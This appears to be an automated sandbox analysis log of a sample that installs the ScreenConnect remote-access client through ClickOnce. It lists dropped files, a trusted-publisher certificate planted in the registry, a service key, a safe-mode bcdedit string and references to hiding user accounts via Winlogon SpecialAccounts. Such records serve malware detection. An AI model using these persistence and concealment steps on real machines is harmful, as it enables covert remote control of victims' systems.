Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll Jump to dropped file
Source: ScreenConnect.ClientService.dll.2.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll0.2.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)

Hooking and other Techniques for Hiding and Protection

barindex
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll0.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
